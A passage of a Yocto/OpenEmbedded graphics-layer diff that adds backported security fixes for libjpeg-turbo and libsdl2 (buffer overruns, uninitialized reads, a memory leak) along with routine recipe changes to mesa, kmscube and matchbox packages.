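Whether the read-and-discard fallback is acceptable depends on the application; the simpler option is to avoid combining row skipping with two-pass quantization at all.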
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
+From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 6 Apr 2021 12:51:03 -0500
+Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
+
+- The PPM reader now throws an error rather than segfaulting (due to a
+ buffer overrun) if an application attempts to load a 16-bit PPM file
+ into a grayscale uncompressed image buffer. No known applications
+ allowed that (not even the test applications in libjpeg-turbo),
+ because that mode of operation was never expected to work and did not
+ work under any circumstances. (In fact, it was necessary to modify
+ TJBench in order to reproduce the issue outside of a fuzzing
+ environment.) This was purely a matter of making the library bow out
+ gracefully rather than crash if an application tries to do something
+ really stupid.
+
+- The PPM reader now throws an error rather than generating incorrect
+ pixels if an application attempts to load a 16-bit PGM file into an
+ RGB uncompressed image buffer.
+
+- The PPM reader now correctly loads 16-bit PPM files into extended
+ RGB uncompressed image buffers. (Previously it generated incorrect
+ pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
+
+The only way that users could have potentially encountered these issues
+was through the tjLoadImage() function. cjpeg and TJBench were
+unaffected.
+
+CVE: CVE-2021-46822
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
+Comment: Refreshed hunks from ChangeLog.md
+ Refreshed hunks from rdppm.c
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+
+---
+ ChangeLog.md | 10 ++++++++++
+ rdppm.c | 26 ++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 968969c6b..12e730a0e 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -44,6 +44,15 @@
+ that maximum value was less than 255. libjpeg-turbo 1.5.0 already included a
+ similar fix for binary PPM/PGM files with maximum values greater than 255.
+
++7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
++overrun) or generating incorrect pixels, if an application attempts to use the
++`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
++with a maximum value greater than 255) into a grayscale image buffer or to load
++a 16-bit binary PGM file into an RGB image buffer.
++
++8. Fixed an issue in the PPM reader that caused incorrect pixels to be
++generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
++file into an extended RGB image buffer.
+
+ 2.0.3
+ =====
+diff --git a/rdppm.c b/rdppm.c
+index c4c937e8a..6ac8fdbf7 100644
+--- a/rdppm.c
++++ b/rdppm.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2009 by Bill Allombert, Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2015-2017, 2020, D. R. Commander.
++ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ register JSAMPLE *rescale = source->rescale;
+ JDIMENSION col;
+ unsigned int maxval = source->maxval;
++ register int rindex = rgb_red[cinfo->in_color_space];
++ register int gindex = rgb_green[cinfo->in_color_space];
++ register int bindex = rgb_blue[cinfo->in_color_space];
++ register int aindex = alpha_index[cinfo->in_color_space];
++ register int ps = rgb_pixelsize[cinfo->in_color_space];
+
+ if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
+ ERREXIT(cinfo, JERR_INPUT_EOF);
+@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[rindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[gindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[bindex] = rescale[temp];
++ if (aindex >= 0)
++ ptr[aindex] = 0xFF;
++ ptr += ps;
+ }
+ return 1;
+ }
+@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ cinfo->in_color_space = JCS_GRAYSCALE;
+ TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_gray_row;
++ if (cinfo->in_color_space == JCS_GRAYSCALE)
++ source->pub.get_pixel_rows = get_word_gray_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ cinfo->in_color_space == JCS_GRAYSCALE) {
+ source->pub.get_pixel_rows = get_raw_row;
+@@ -657,7 +657,10 @@
+ cinfo->in_color_space = JCS_EXT_RGB;
+ TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_rgb_row;
++ if (IsExtRGB(cinfo->in_color_space))
++ source->pub.get_pixel_rows = get_word_rgb_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ (cinfo->in_color_space == JCS_EXT_RGB
+ #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
+From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 4 Apr 2023 19:06:20 -0500
+Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
+
+The 2-pass color quantization algorithm assumes 3-sample pixels. RGB565
+is the only 3-component colorspace that doesn't have 3-sample pixels, so
+we need to treat it as a special case when determining whether to enable
+2-pass color quantization. Otherwise, attempting to initialize 2-pass
+color quantization with an RGB565 output buffer could cause
+prescan_quantize() to read from uninitialized memory and subsequently
+underflow/overflow the histogram array.
+
+djpeg is supposed to fail gracefully if both -rgb565 and -colors are
+specified, because none of its destination managers (image writers)
+support color quantization with RGB565. However, prescan_quantize() was
+called before that could occur. It is possible but very unlikely that
+these issues could have been reproduced in applications other than
+djpeg. The issues involve the use of two features (12-bit precision and
+RGB565) that are incompatible, and they also involve the use of two
+rarely-used legacy features (RGB565 and color quantization) that don't
+make much sense when combined.
+
+Fixes #668
+Fixes #671
+Fixes #680
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 6 ++++++
+ jdmaster.c | 5 +++--
+ jquant2.c | 5 +++--
+ 3 files changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index e605abe73..de0c4d0dd 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -1,3 +1,9 @@ quality values.
++9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
++overruns when attempting to decompress various specially-crafted malformed
++12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
++(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
++enabled.
++
+ 2.0.4
+ =====
+
+diff --git a/jdmaster.c b/jdmaster.c
+index b20906438..8d8ef9956 100644
+--- a/jdmaster.c
++++ b/jdmaster.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2002-2009 by Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009-2011, 2016, D. R. Commander.
++ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
+ if (cinfo->raw_data_out)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+ /* 2-pass quantizer only works in 3-component color space. */
+- if (cinfo->out_color_components != 3) {
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565) {
+ cinfo->enable_1pass_quant = TRUE;
+ cinfo->enable_external_quant = FALSE;
+ cinfo->enable_2pass_quant = FALSE;
+diff --git a/jquant2.c b/jquant2.c
+index 6570613bb..c760380fb 100644
+--- a/jquant2.c
++++ b/jquant2.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1991-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
+ cquantize->error_limiter = NULL;
+
+ /* Make sure jdmaster didn't give me a case I can't handle */
+- if (cinfo->out_color_components != 3)
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+
+ /* Allocate the histogram/inverse colormap storage */
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
+From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 6 Apr 2023 18:33:41 -0500
+Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
+
+When computing the downsampled width for a particular component,
+jpeg_crop_scanline() needs to take into account the fact that the
+libjpeg code uses a combination of IDCT scaling and upsampling to
+implement 4x2 and 2x4 upsampling with certain decompression scaling
+factors. Failing to account for that led to incomplete upsampling of
+4x2- or 2x4-subsampled components, which caused the color converter to
+read from uninitialized memory. With 12-bit data precision, this caused
+a buffer overrun or underrun and subsequent segfault if the
+uninitialized memory contained a value that was outside of the valid
+sample range (because the color converter uses the value as an array
+index.)
+
+Fixes #669
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 8 ++++++++
+ jdapistd.c | 10 ++++++----
+ 2 files changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index de0c4d0dd..159bd1610 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
+ (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
+ enabled.
+
++10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
++downsampled width for components with 4x2 or 2x4 subsampling factors if
++decompression scaling was enabled. This caused the components to be upsampled
++incompletely, which caused the color converter to read from uninitialized
++memory. With 12-bit data precision, this caused a buffer overrun or underrun
++and subsequent segfault if the sample value read from unitialized memory was
++outside of the valid sample range.
++
+ 2.0.4
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 628626254..eb577928c 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
+ /* Set downsampled_width to the new output width. */
+ orig_downsampled_width = compptr->downsampled_width;
+ compptr->downsampled_width =
+- (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
+- compptr->h_samp_factor),
+- (long)cinfo->max_h_samp_factor);
++ (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
++ (long)(compptr->h_samp_factor *
++ compptr->_DCT_scaled_size),
++ (long)(cinfo->max_h_samp_factor *
++ cinfo->_min_DCT_scaled_size));
+ if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
+ reinit_upsampler = TRUE;
+
diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target = " nasm-native"
SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
file://0001-libjpeg-turbo-fix-package_qa-error.patch \
file://CVE-2020-13790.patch \
+ file://CVE-2021-46822.patch \
+ file://CVE-2020-35538-1.patch \
+ file://CVE-2020-35538-2.patch \
+ file://CVE-2023-2804-1.patch \
+ file://CVE-2023-2804-2.patch \
"
SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"
diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
-DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm"
+SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
+DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
+without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
+setting), GBM (graphics buffer manager) and EGL for rendering content using \
+OpenGL or OpenGL ES."
HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
LICENSE = "MIT"
SECTION = "graphics"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
PV = "0.3+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
#SRCREV for 1.12
SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
+From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Wed, 17 Jun 2020 08:44:45 -0700
+Subject: [PATCH] Fixed overflow in surface pitch calculation
+
+
+Upstream-Status: Backport
+[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
+CVE: CVE-2020-14409 CVE-2020-14410
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ src/video/SDL_surface.c | 23 +++++++++++++++--------
+ 1 file changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
+index 085d9ff1e..bff826f7c 100644
+--- a/src/video/SDL_surface.c
++++ b/src/video/SDL_surface.c
+@@ -28,24 +28,23 @@
+ #include "SDL_yuv_c.h"
+
+
+-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
+-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
+- sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
++/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
++SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
+
+ /* Public routines */
+
+ /*
+ * Calculate the pad-aligned scanline width of a surface
+ */
+-static int
++static Sint64
+ SDL_CalculatePitch(Uint32 format, int width)
+ {
+- int pitch;
++ Sint64 pitch;
+
+ if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
+- pitch = (width * SDL_BYTESPERPIXEL(format));
++ pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
+ } else {
+- pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
++ pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
+ }
+ pitch = (pitch + 3) & ~3; /* 4-byte aligning for speed */
+ return pitch;
+@@ -59,11 +58,19 @@ SDL_Surface *
+ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ Uint32 format)
+ {
++ Sint64 pitch;
+ SDL_Surface *surface;
+
+ /* The flags are no longer used, make the compiler happy */
+ (void)flags;
+
++ pitch = SDL_CalculatePitch(format, width);
++ if (pitch < 0 || pitch > SDL_MAX_SINT32) {
++ /* Overflow... */
++ SDL_OutOfMemory();
++ return NULL;
++ }
++
+ /* Allocate the surface */
+ surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
+ if (surface == NULL) {
+@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ }
+ surface->w = width;
+ surface->h = height;
+- surface->pitch = SDL_CalculatePitch(format, width);
++ surface->pitch = (int)pitch;
+ SDL_SetClipRect(surface, NULL);
+
+ if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
+From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Tue, 30 Nov 2021 12:36:46 -0800
+Subject: [PATCH] Always create a full 256-entry map in case color values are
+ out of range
+
+Fixes https://github.com/libsdl-org/SDL/issues/5042
+
+CVE: CVE-2021-33657
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/video/SDL_pixels.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
+index ac04533c5d5..9bb02f771d0 100644
+--- a/src/video/SDL_pixels.c
++++ b/src/video/SDL_pixels.c
+@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
+ }
+ *identical = 0;
+ }
+- map = (Uint8 *) SDL_malloc(src->ncolors);
++ map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
+@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
+ SDL_Palette *pal = src->palette;
+
+ bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
+- map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
++ map = (Uint8 *) SDL_calloc(256, bpp);
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
+From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Wed, 21 Sep 2022 10:30:38 +0800
+Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
+
+
+CVE: CVE-2022-4743
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/render/opengles/SDL_render_gles.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
+index a5fbab309eda..ba08a46e2805 100644
+--- a/src/render/opengles/SDL_render_gles.c
++++ b/src/render/opengles/SDL_render_gles.c
+@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+ renderdata->glGenTextures(1, &data->texture);
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glGenTextures()", result);
+ }
+@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glTexImage2D()", result);
+ }
diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index 1049aa548a..fa29bc99ac 100644
--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
file://more-gen-depends.patch \
file://directfb-spurious-curly-brace-missing-e.patch \
file://directfb-renderfillrect-fix.patch \
+ file://CVE-2020-14409-14410.patch \
+ file://CVE-2021-33657.patch \
+ file://CVE-2022-4743.patch \
"
S = "${WORKDIR}/SDL2-${PV}"
@@ -57,7 +60,7 @@ PACKAGECONFIG ??= " \
"
PACKAGECONFIG[alsa] = "--enable-alsa --disable-alsatest,--disable-alsa,alsa-lib,"
PACKAGECONFIG[arm-neon] = "--enable-arm-neon,--disable-arm-neon"
-PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb"
+PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb,directfb"
PACKAGECONFIG[gles2] = "--enable-video-opengles,--disable-video-opengles,virtual/libgles2"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[kmsdrm] = "--enable-video-kmsdrm,--disable-video-kmsdrm,libdrm virtual/libgbm"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
# SRCREV tagged 1.2.2
SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
file://0001-Fix-build-with-gcc-10.patch \
file://kbdconfig"
diff --git a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
index cd35a1f850..a64f2faa85 100644
--- a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
+++ b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
@@ -6,6 +6,21 @@ Subject: [PATCH] meson.build: make TLS ELF optional
USE_ELF_TLS has replaced GLX_USE_TLS so this patch is the original "make
TLS GLX optional again" patch updated to the latest mesa.
+For details, see:
+https://gitlab.freedesktop.org/mesa/mesa/-/issues/966
+
+This prevents runtime segfault on musl:
+
+Traceback (most recent call last):
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/core/decorator/__init__.py", line 36, in wrapped_f
+ return func(*args, **kwargs)
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/runtime/cases/parselogs.py", line 378, in test_parselogs
+ self.assertEqual(errcount, 0, msg=self.msg)
+AssertionError: 1 != 0 : Log: /home/pokybuild/yocto-worker/musl-qemux86/build/build/tmp/work/qemux86-poky-linux-musl/core-image-sato-sdk/1.0-r0/target_logs/Xorg.0.log
+-----------------------
+Central error: [ 10.477] (EE) Failed to load /usr/lib/xorg/modules/extensions/libglx.so: Error relocating /usr/lib/libGL.so.1: alphasort: initial-exec TLS resolves to dynamic definition in /usr/lib/libGL.so.1
+***********************
+
Upstream-Status: Inappropriate [configuration]
Signed-off-by: Alistair Francis <alistair@alistair23.me>
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index b7ef496fdc..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -26,11 +26,6 @@ PROVIDES = " \
inherit meson pkgconfig python3native gettext features_check
-# Unset these to stop python trying to report the target Python setup
-_PYTHON_SYSCONFIGDATA_NAME[unexport] = "1"
-STAGING_INCDIR[unexport] = "1"
-STAGING_LIBDIR[unexport] = "1"
-
BBCLASSEXTEND = "native nativesdk"
ANY_OF_DISTRO_FEATURES_class-target = "opengl vulkan"
@@ -236,7 +231,7 @@ python mesa_populate_packages() {
import re
dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
if os.path.isdir(dri_drivers_root):
- dri_pkgs = os.listdir(dri_drivers_root)
+ dri_pkgs = sorted(os.listdir(dri_drivers_root))
lib_name = d.expand("${MLPREFIX}mesa-megadriver")
for p in dri_pkgs:
m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
